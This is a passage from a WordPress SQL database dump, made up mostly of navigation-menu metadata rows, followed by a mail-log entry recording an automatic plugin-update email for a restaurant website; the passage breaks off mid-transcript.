enu_item_url',''),(36474,3585,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36475,3585,'_menu_item_icon','null'),(36476,3586,'_menu_item_type','post_type'),(36477,3586,'_menu_item_menu_item_parent','3424'),(36478,3586,'_menu_item_object_id','2174'),(36479,3586,'_menu_item_object','page'),(36480,3586,'_menu_item_target',''),(36481,3586,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36482,3586,'_menu_item_xfn',''),(36483,3586,'_menu_item_url',''),(36484,3586,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36485,3586,'_menu_item_icon','icon-star'),(36486,3586,'_menu_item_icon_pack','simple_line_icons'),(36487,3587,'_menu_item_type','post_type'),(36488,3587,'_menu_item_menu_item_parent','3428'),(36489,3587,'_menu_item_object_id','2174'),(36490,3587,'_menu_item_object','page'),(36491,3587,'_menu_item_target',''),(36492,3587,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36493,3587,'_menu_item_xfn',''),(36494,3587,'_menu_item_url',''),(36495,3587,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36496,3587,'_menu_item_icon','icon-star'),(36497,3587,'_menu_item_icon_pack','simple_line_icons'),(36498,3588,'_menu_item_type','post_type'),(36499,3588,'_menu_item_menu_item_parent','3405'),(36500,3588,'_menu_item_object_id','1679'),(36501,3588,'_menu_item_object','page'),(36502,3588,'_menu_item_target',''),(36503,3588,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36504,3588,'_menu_item_xfn',''),(36505,3588,'_menu_item_url',''),(36506,3588,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36507,3588,'_menu_item_icon','null'),(38409,3751,'_menu_item_url','#'),(38408,3751,'_menu_item_xfn',''),(38407,3751,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38406,3751,'_menu_item_target',''),(38405,3751,'_menu_item_object','custom'),(38404,3751,'_menu_item_object_id','3751'),(38403,3751,'_menu_item_menu_item_parent','3727'),(38402,3751,'_menu_item_type','custom'),(52181,4363,'_menu_item_object_id','4363'),(52179,4363,'_menu_item_type','custom'),(52177,4362,'_menu_item_url','#'),(52174,4362,'_menu_item_target',''),(52175,4362,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52173,4362,'_menu_item_object','custom'),(52172,4362,'_menu_item_object_id','4362'),(52171,4362,'_menu_item_menu_item_parent','0'),(52169,4361,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52170,4362,'_menu_item_type','custom'),(38170,3726,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38169,3726,'_menu_item_url','#'),(38168,3726,'_menu_item_xfn',''),(38167,3726,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38166,3726,'_menu_item_target',''),(38165,3726,'_menu_item_object','custom'),(38163,3726,'_menu_item_menu_item_parent','0'),(38164,3726,'_menu_item_object_id','3726'),(38359,3746,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38358,3746,'_menu_item_target',''),(38357,3746,'_menu_item_object','custom'),(38356,3746,'_menu_item_object_id','3746'),(38355,3746,'_menu_item_menu_item_parent','3731'),(38354,3746,'_menu_item_type','custom'),(38245,3734,'_menu_item_object_id','3734'),(38244,3734,'_menu_item_menu_item_parent','0'),(38243,3734,'_menu_item_type','custom'),(38242,3733,'_menu_item_icon','null'),(38241,3733,'_menu_item_type_menu','wide'),(38240,3733,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52294,4375,'_menu_item_menu_item_parent','4362'),(52295,4375,'_menu_item_object_id','4375'),(52296,4375,'_menu_item_object','custom'),(52297,4375,'_menu_item_target',''),(52298,4375,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52299,4375,'_menu_item_xfn',''),(52300,4375,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(36568,3595,'_menu_item_type','post_type'),(36569,3595,'_menu_item_menu_item_parent','3432'),(36570,3595,'_menu_item_object_id','3078'),(36571,3595,'_menu_item_object','portfolio-item'),(36572,3595,'_menu_item_target',''),(36573,3595,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36574,3595,'_menu_item_xfn',''),(36575,3595,'_menu_item_url',''),(36576,3595,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36577,3595,'_menu_item_icon','null'),(36578,3596,'_menu_item_type','post_type'),(36579,3596,'_menu_item_menu_item_parent','3412'),(36580,3596,'_menu_item_object_id','3441'),(36581,3596,'_menu_item_object','page'),(36582,3596,'_menu_item_target',''),(36583,3596,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36584,3596,'_menu_item_xfn',''),(36585,3596,'_menu_item_url',''),(36586,3596,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36587,3597,'_menu_item_type','post_type'),(36588,3597,'_menu_item_menu_item_parent','3435'),(36589,3597,'_menu_item_object_id','3075'),(36590,3597,'_menu_item_object','portfolio-item'),(36591,3597,'_menu_item_target',''),(36592,3597,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36593,3597,'_menu_item_xfn',''),(36594,3597,'_menu_item_url',''),(36595,3597,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36596,3597,'_menu_item_icon','null'),(36597,3598,'_menu_item_type','post_type'),(36598,3598,'_menu_item_menu_item_parent','3435'),(36599,3598,'_menu_item_object_id','3076'),(36600,3598,'_menu_item_object','portfolio-item'),(36601,3598,'_menu_item_target',''),(36602,3598,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36603,3598,'_menu_item_xfn',''),(36604,3598,'_menu_item_url',''),(36605,3598,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36606,3598,'_menu_item_icon','null'),(36607,3599,'_menu_item_type','post_type'),(36608,3599,'_menu_item_menu_item_parent','3435'),(36609,3599,'_menu_item_object_id','3077'),(36610,3599,'_menu_item_object','portfolio-item'),(36611,3599,'_menu_item_target',''),(36612,3599,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36613,3599,'_menu_item_xfn',''),(36614,3599,'_menu_item_url',''),(36615,3599,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36616,3599,'_menu_item_icon','null'),(36617,3600,'_menu_item_type','post_type'),(36618,3600,'_menu_item_menu_item_parent','3435'),(36619,3600,'_menu_item_object_id','3078'),(36620,3600,'_menu_item_object','portfolio-item'),(36621,3600,'_menu_item_target',''),(36622,3600,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36623,3600,'_menu_item_xfn',''),(36624,3600,'_menu_item_url',''),(36625,3600,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36626,3600,'_menu_item_icon','null'),(36627,3601,'_menu_item_type','post_type'),(36628,3601,'_menu_item_menu_item_parent','3435'),(36629,3601,'_menu_item_object_id','3098'),(36630,3601,'_menu_item_object','portfolio-item'),(36631,3601,'_menu_item_target',''),(36632,3601,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36633,3601,'_menu_item_xfn',''),(36634,3601,'_menu_item_url',''),(36635,3601,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36636,3601,'_menu_item_icon','null'),(36637,3602,'_menu_item_type','post_type'),(36638,3602,'_menu_item_menu_item_parent','3430'),(36639,3602,'_menu_item_object_id','2387'),(36640,3602,'_menu_item_object','page'),(36641,3602,'_menu_item_target',''),(36642,3602,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36643,3602,'_menu_item_xfn',''),(36644,3602,'_menu_item_url',''),(36645,3602,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36646,3602,'_menu_item_icon','null'),(36647,3603,'_menu_item_type','post_type'),(36648,3603,'_menu_item_menu_item_parent','3426'),(36649,3603,'_menu_item_object_id','2387'),(36650,3603,'_menu_item_object','page'),(36651,3603,'_menu_item_target',''),(36652,3603,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36653,3603,'_menu_item_xfn',''),(36654,3603,'_menu_item_url',''),(36655,3603,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36656,3603,'_menu_item_icon','null'),(36657,3604,'_menu_item_type','post_type'),(36658,3604,'_menu_item_menu_item_parent','3438'),(36659,3604,'_menu_item_object_id','3075'),(36660,3604,'_menu_item_object','portfolio-item'),(36661,3604,'_menu_item_target',''),(36662,3604,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36663,3604,'_menu_item_xfn',''),(36664,3604,'_menu_item_url',''),(36665,3604,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36666,3605,'_menu_item_type','post_type'),(36667,3605,'_menu_item_menu_item_parent','3405'),(36668,3605,'_menu_item_object_id','2421'),(36669,3605,'_menu_item_object','page'),(36670,3605,'_menu_item_target',''),(36671,3605,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36672,3605,'_menu_item_xfn',''),(36673,3605,'_menu_item_url',''),(36674,3605,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36675,3605,'_menu_item_icon','null'),(36676,3606,'_menu_item_type','post_type'),(36677,3606,'_menu_item_menu_item_parent','3405'),(36678,3606,'_menu_item_object_id','2419'),(36679,3606,'_menu_item_object','page'),(36680,3606,'_menu_item_target',''),(36681,3606,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36682,3606,'_menu_item_xfn',''),(36683,3606,'_menu_item_url',''),(36684,3606,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36685,3606,'_menu_item_icon','null'),(36686,3607,'_menu_item_type','post_type'),(36687,3607,'_menu_item_menu_item_parent','3397'),(36688,3607,'_menu_item_object_id','2421'),(36689,3607,'_menu_item_object','page'),(36690,3607,'_menu_item_target',''),(36691,3607,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36692,3607,'_menu_item_xfn',''),(36693,3607,'_menu_item_url',''),(36694,3607,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36695,3607,'_menu_item_icon','null'),(36696,3608,'_menu_item_type','post_type'),(36697,3608,'_menu_item_menu_item_parent','3397'),(36698,3608,'_menu_item_object_id','2419'),(36699,3608,'_menu_item_object','page'),(36700,3608,'_menu_item_target',''),(36701,3608,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36702,3608,'_menu_item_xfn',''),(36703,3608,'_menu_item_url',''),(36704,3608,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36705,3608,'_menu_item_icon','null'),(36706,3609,'_menu_item_type','post_type'),(36707,3609,'_menu_item_menu_item_parent','3399'),(36708,3609,'_menu_item_object_id','2435'),(36709,3609,'_menu_item_object','page'),(36710,3609,'_menu_item_target',''),(36711,3609,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36712,3609,'_menu_item_xfn',''),(36713,3609,'_menu_item_url',''),(36714,3609,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36715,3609,'_menu_item_icon','null'),(36716,3610,'_menu_item_type','post_type'),(36717,3610,'_menu_item_menu_item_parent','3403'),(36718,3610,'_menu_item_object_id','2435'),(36719,3610,'_menu_item_object','page'),(36720,3610,'_menu_item_target',''),(36721,3610,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36722,3610,'_menu_item_xfn',''),(36723,3610,'_menu_item_url',''),(36724,3610,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36725,3610,'_menu_item_icon','null'),(36726,3611,'_menu_item_type','post_type'),(36727,3611,'_menu_item_menu_item_parent','3438'),(36728,3611,'_menu_item_object_id','2435'),(36729,3611,'_menu_item_object','page'),(36730,3611,'_menu_item_target',''),(36731,3611,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36732,3611,'_menu_item_xfn',''),(36733,3611,'_menu_item_url',''),(36734,3611,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36735,3612,'_menu_item_type','post_type'),(36736,3612,'_menu_item_menu_item_parent','3437'),(36737,3612,'_menu_item_object_id','1811'),(36738,3612,'_menu_item_object','page'),(36739,3612,'_menu_item_target',''),(36740,3612,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36741,3612,'_menu_item_xfn',''),(36742,3612,'_menu_item_url',''),(36743,3612,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36744,3612,'_menu_item_icon','null'),(36745,3613,'_menu_item_type','post_type'),(36746,3613,'_menu_item_menu_item_parent','3437'),(36747,3613,'_menu_item_object_id','1819'),(36748,3613,'_menu_item_object','page'),(36749,3613,'_menu_item_target',''),(36750,3613,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36751,3613,'_menu_item_xfn',''),(36752,3613,'_menu_item_url',''),(36753,3613,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36754,3613,'_menu_item_icon','null'),(36755,3614,'_menu_item_type','post_type'),(36756,3614,'_menu_item_menu_item_parent','3437'),(36757,3614,'_menu_item_object_id','1805'),(36758,3614,'_menu_item_object','page'),(36759,3614,'_menu_item_target',''),(36760,3614,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36761,3614,'_menu_item_xfn',''),(36762,3614,'_menu_item_url',''),(36763,3614,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36764,3614,'_menu_item_icon','null'),(36765,3615,'_menu_item_type','post_type'),(36766,3615,'_menu_item_menu_item_parent','3437'),(36767,3615,'_menu_item_object_id','2448'),(36768,3615,'_menu_item_object','page'),(36769,3615,'_menu_item_target',''),(36770,3615,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36771,3615,'_menu_item_xfn',''),(36772,3615,'_menu_item_url',''),(36773,3615,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36774,3615,'_menu_item_icon','null'),(36775,3616,'_menu_item_type','post_type'),(36776,3616,'_menu_item_menu_item_parent','3440'),(36777,3616,'_menu_item_object_id','2448'),(36778,3616,'_menu_item_object','page'),(36779,3616,'_menu_item_target',''),(36780,3616,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36781,3616,'_menu_item_xfn',''),(36782,3616,'_menu_item_url',''),(36783,3616,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36784,3616,'_menu_item_icon','null'),(36785,3617,'_menu_item_type','post_type'),(36786,3617,'_menu_item_menu_item_parent','3440'),(36787,3617,'_menu_item_object_id','1811'),(36788,3617,'_menu_item_object','page'),(36789,3617,'_menu_item_target',''),(36790,3617,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36791,3617,'_menu_item_xfn',''),(36792,3617,'_menu_item_url',''),(36793,3617,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36794,3617,'_menu_item_icon','null'),(36795,3618,'_menu_item_type','post_type'),(36796,3618,'_menu_item_menu_item_parent','3440'),(36797,3618,'_menu_item_object_id','1819'),(36798,3618,'_menu_item_object','page'),(36799,3618,'_menu_item_target',''),(36800,3618,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36801,3618,'_menu_item_xfn',''),(36802,3618,'_menu_item_url',''),(36803,3618,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36804,3618,'_menu_item_icon','null'),(36805,3619,'_menu_item_type','post_type'),(36806,3619,'_menu_item_menu_item_parent','3440'),(36807,3619,'_menu_item_object_id','1805'),(36808,3619,'_menu_item_object','page'),(36809,3619,'_menu_item_target',''),(36810,3619,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36811,3619,'_menu_item_xfn',''),(36812,3619,'_menu_item_url',''),(36813,3619,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36814,3619,'_menu_item_icon','null'),(36815,3620,'_menu_item_type','post_type'),(36816,3620,'_menu_item_menu_item_parent','3439'),(36817,3620,'_menu_item_object_id','2457'),(36818,3620,'_menu_item_object','page'),(36819,3620,'_menu_item_target',''),(36820,3620,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36821,3620,'_menu_item_xfn',''),(36822,3620,'_menu_item_url',''),(36823,3620,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36824,3620,'_menu_item_icon','null'),(36825,3621,'_menu_item_type','post_type'),(36826,3621,'_menu_item_menu_item_parent','3436'),(36827,3621,'_menu_item_object_id','2457'),(36828,3621,'_menu_item_object','page'),(36829,3621,'_menu_item_target',''),(36830,3621,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36831,3621,'_menu_item_xfn',''),(36832,3621,'_menu_item_url',''),(36833,3621,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36834,3621,'_menu_item_icon','null'),(36835,3622,'_menu_item_type','post_type'),(36836,3622,'_menu_item_menu_item_parent','3424'),(36837,3622,'_menu_item_object_id','2477'),(36838,3622,'_menu_item_object','page'),(36839,3622,'_menu_item_target',''),(36840,3622,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36841,3622,'_menu_item_xfn',''),(36842,3622,'_menu_item_url',''),(36843,3622,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36844,3622,'_menu_item_icon','icon-star'),(36845,3622,'_menu_item_icon_pack','simple_line_icons'),(36846,3623,'_menu_item_type','post_type'),(36847,3623,'_menu_item_menu_item_parent','3428'),(36848,3623,'_menu_item_object_id','2477'),(36849,3623,'_menu_item_object','page'),(36850,3623,'_menu_item_target',''),(36851,3623,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36852,3623,'_menu_item_xfn',''),(36853,3623,'_menu_item_url',''),(36854,3623,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36855,3623,'_menu_item_icon','icon-star'),(36856,3623,'_menu_item_icon_pack','simple_line_icons'),(36857,3624,'_menu_item_type','post_type'),(36858,3624,'_menu_item_menu_item_parent','3429'),(36859,3624,'_menu_item_object_id','2494'),(36860,3624,'_menu_item_object','page'),(36861,3624,'_menu_item_target',''),(36862,3624,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36863,3624,'_menu_item_xfn',''),(36864,3624,'_menu_item_url',''),(36865,3624,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36866,3624,'_menu_item_icon','icon-star'),(36867,3624,'_menu_item_icon_pack','simple_line_icons'),(36868,3625,'_menu_item_type','post_type'),(36869,3625,'_menu_item_menu_item_parent','3429'),(36870,3625,'_menu_item_object_id','2472'),(36871,3625,'_menu_item_object','page'),(36872,3625,'_menu_item_target',''),(36873,3625,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36874,3625,'_menu_item_xfn',''),(36875,3625,'_menu_item_url',''),(36876,3625,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36877,3625,'_menu_item_icon','icon-star'),(36878,3625,'_menu_item_icon_pack','simple_line_icons'),(36879,3626,'_menu_item_type','post_type'),(36880,3626,'_menu_item_menu_item_parent','3425'),(36881,3626,'_menu_item_object_id','2494'),(36882,3626,'_menu_item_object','page'),(36883,3626,'_menu_item_target',''),(36884,3626,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36885,3626,'_menu_item_xfn',''),(36886,3626,'_menu_item_url',''),(36887,3626,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36888,3626,'_menu_item_icon','icon-star'),(36889,3626,'_menu_item_icon_pack','simple_line_icons'),(36890,3627,'_menu_item_type','post_type'),(36891,3627,'_menu_item_menu_item_parent','3425'),(36892,3627,'_menu_item_object_id','2472'),(36893,3627,'_menu_item_object','page'),(36894,3627,'_menu_item_target',''),(36895,3627,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36896,3627,'_menu_item_xfn',''),(36897,3627,'_menu_item_url',''),(36898,3627,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36899,3627,'_menu_item_icon','icon-star'),(36900,3627,'_menu_item_icon_pack','simple_line_icons'),(36901,3628,'_menu_item_type','post_type'),(36902,3628,'_menu_item_menu_item_parent','3399'),(36903,3628,'_menu_item_object_id','2627'),(36904,3628,'_menu_item_object','page'),(36905,3628,'_menu_item_target',''),(36906,3628,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36907,3628,'_menu_item_xfn',''),(36908,3628,'_menu_item_url',''),(36909,3628,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36910,3628,'_menu_item_icon','null'),(36911,3629,'_menu_item_type','post_type'),(36912,3629,'_menu_item_menu_item_parent','3399'),(36913,3629,'_menu_item_object_id','2625'),(36914,3629,'_menu_item_object','page'),(36915,3629,'_menu_item_target',''),(36916,3629,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36917,3629,'_menu_item_xfn',''),(36918,3629,'_menu_item_url',''),(36919,3629,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36920,3629,'_menu_item_icon','null'),(36921,3630,'_menu_item_type','post_type'),(36922,3630,'_menu_item_menu_item_parent','3438'),(36923,3630,'_menu_item_object_id','2627'),(36924,3630,'_menu_item_object','page'),(36925,3630,'_menu_item_target',''),(36926,3630,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36927,3630,'_menu_item_xfn',''),(36928,3630,'_menu_item_url',''),(36929,3630,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36930,3631,'_menu_item_type','post_type'),(36931,3631,'_menu_item_menu_item_parent','3438'),(36932,3631,'_menu_item_object_id','2625'),(36933,3631,'_menu_item_object','page'),(36934,3631,'_menu_item_target',''),(36935,3631,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36936,3631,'_menu_item_xfn',''),(36937,3631,'_menu_item_url',''),(36938,3631,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36939,3632,'_menu_item_type','post_type'),(36940,3632,'_menu_item_menu_item_parent','3403'),(36941,3632,'_menu_item_object_id','2627'),(36942,3632,'_menu_item_object','page'),(36943,3632,'_menu_item_target',''),(36944,3632,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36945,3632,'_menu_item_xfn',''),(36946,3632,'_menu_item_url',''),(36947,3632,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36948,3633,'_menu_item_type','post_type'),(36949,3633,'_menu_item_menu_item_parent','3403'),(36950,3633,'_menu_item_object_id','2625'),(36951,3633,'_menu_item_object','page'),(36952,3633,'_menu_item_target',''),(36953,3633,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36954,3633,'_menu_item_xfn',''),(36955,3633,'_menu_item_url',''),(36956,3633,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36957,3633,'_menu_item_icon','null'),(36958,3634,'_menu_item_type','post_type'),(36959,3634,'_menu_item_menu_item_parent','3439'),(36960,3634,'_menu_item_object_id','3065'),(36961,3634,'_menu_item_object','page'),(36962,3634,'_menu_item_target',''),(36963,3634,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36964,3634,'_menu_item_xfn',''),(36965,3634,'_menu_item_url',''),(36966,3634,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36967,3634,'_menu_item_icon','null'),(36968,3635,'_menu_item_type','post_type'),(36969,3635,'_menu_item_menu_item_parent','3439'),(36970,3635,'_menu_item_object_id','3067'),(36971,3635,'_menu_item_object','page'),(36972,3635,'_menu_item_target',''),(36973,3635,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36974,3635,'_menu_item_xfn',''),(36975,3635,'_menu_item_url',''),(36976,3635,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36977,3635,'_menu_item_icon','null'),(36978,3636,'_menu_item_type','post_type'),(36979,3636,'_menu_item_menu_item_parent','3439'),(36980,3636,'_menu_item_object_id','3066'),(36981,3636,'_menu_item_object','page'),(36982,3636,'_menu_item_target',''),(36983,3636,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36984,3636,'_menu_item_xfn',''),(36985,3636,'_menu_item_url',''),(36986,3636,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36987,3636,'_menu_item_icon','null'),(36988,3637,'_menu_item_type','post_type'),(36989,3637,'_menu_item_menu_item_parent','3436'),(36990,3637,'_menu_item_object_id','2646'),(36991,3637,'_menu_item_object','page'),(36992,3637,'_menu_item_target',''),(36993,3637,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36994,3637,'_menu_item_xfn',''),(36995,3637,'_menu_item_url',''),(36996,3637,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36997,3637,'_menu_item_icon','null'),(36998,3638,'_menu_item_type','post_type'),(36999,3638,'_menu_item_menu_item_parent','3439'),(37000,3638,'_menu_item_object_id','2646'),(37001,3638,'_menu_item_object','page'),(37002,3638,'_menu_item_target',''),(37003,3638,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(37004,3638,'_menu_item_xfn',''),(37005,3638,'_menu_item_url',''),(37006,3638,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(37007,3638,'_menu_item_icon','null'),(37008,3639,'_menu_item_type','post_type'),(37009,3639,'_menu_item_menu_item_parent','3401'),(37010,3639,'_menu_item_object_id','2652'),(37011,3639,'_menu_item_object','page'),(37012,3639,'_menu_item_target',''),(37013,3639,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(37014,3639,'_menu_item_xfn',''),(37015,3639,'_menu_item_url',''),(37016,3639,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(37017,3639,'_menu_item_icon','null'),(37018,3640,'_menu_item_type','post_type'),(37019,3640,'_menu_item_menu_item_parent','3395'),(37020,3640,'_menu_item_object_id','2652'),(37021,3640,'_menu_item_object','page'),(37022,3640,'_menu_item_target',''),(37023,3640,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(37024,3640,'_menu_item_xfn',''),(37025,3640,'_menu_item_url',''),(37026,3640,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(37027,3640,'_menu_item_icon','null'),(37028,3641,'_menu_item_type','post_type'),(37029,3641,'_menu_item_menu_item_parent','3436'),(37030,3641,'_menu_item_object_id','2843'),(37031,3641,'_menu_item_object','page'),(37032,3641,'_menu_item_target',''),(37033,3641,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(37034,3641,'_menu_item_xfn',''),(37035,3641,'_menu_item_url',''),(37036,3641,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(37037,3641,'_menu_item_icon','null'),(37038,3642,'_menu_item_type','post_type'),(37039,3642,'_menu_item_menu_item_parent','3439'),(37040,3642,'_menu_item_object_id','2843'),(37041,3642,'_menu_item_object','page'),(37042,3642,'_menu_item_target',''),(37043,3642,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(37044,3642,'_menu_item_xfn',''),(37045,3642,'_menu_item_url',''),(37046,3642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(37047,3642,'_menu_item_icon','null'),(37048,3643,'_menu_item_type','post_type'),(37049,3643,'_menu_item_menu_item_parent','3436'),(37050,3643,'_menu_item_object_id','2857'),(37051,3643,'_menu_item_object','page'),(37052,3643,'_menu_item_target',''),(37053,3643,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(37054,3643,'_menu_item_xfn',''),(37055,3643,'_menu_item_url',''),(37056,3643,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(37057,3643,'_menu_item_icon','null'),(37058,3644,'_menu_item_type','post_type'),(37059,3644,'_menu_item_menu_item_parent','3439'),(37060,3644,'_menu_item_object_id','2857'),(37061,3644,'_menu_item_object','page'),(37062,3644,'_menu_item_target',''),(37063,3644,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(37064,3644,'_menu_item_xfn',''),(37065,3644,'_menu_item_url',''),(37066,3644,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(37067,3644,'_menu_item_icon','null'),(37068,3645,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37069,3645,'success',''),(37070,3645,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37071,3645,'to_header','webmaster@baldisserri.com'),(37072,3645,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37073,3645,'original_to','webmaster@baldisserri.com'),(37074,3645,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37075,3645,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.5\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37076,3645,'original_headers',''),(37077,3645,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 07 Dec 2020 19:22:35 -0500 \r\n220-We do not authorize the use of this system to transport 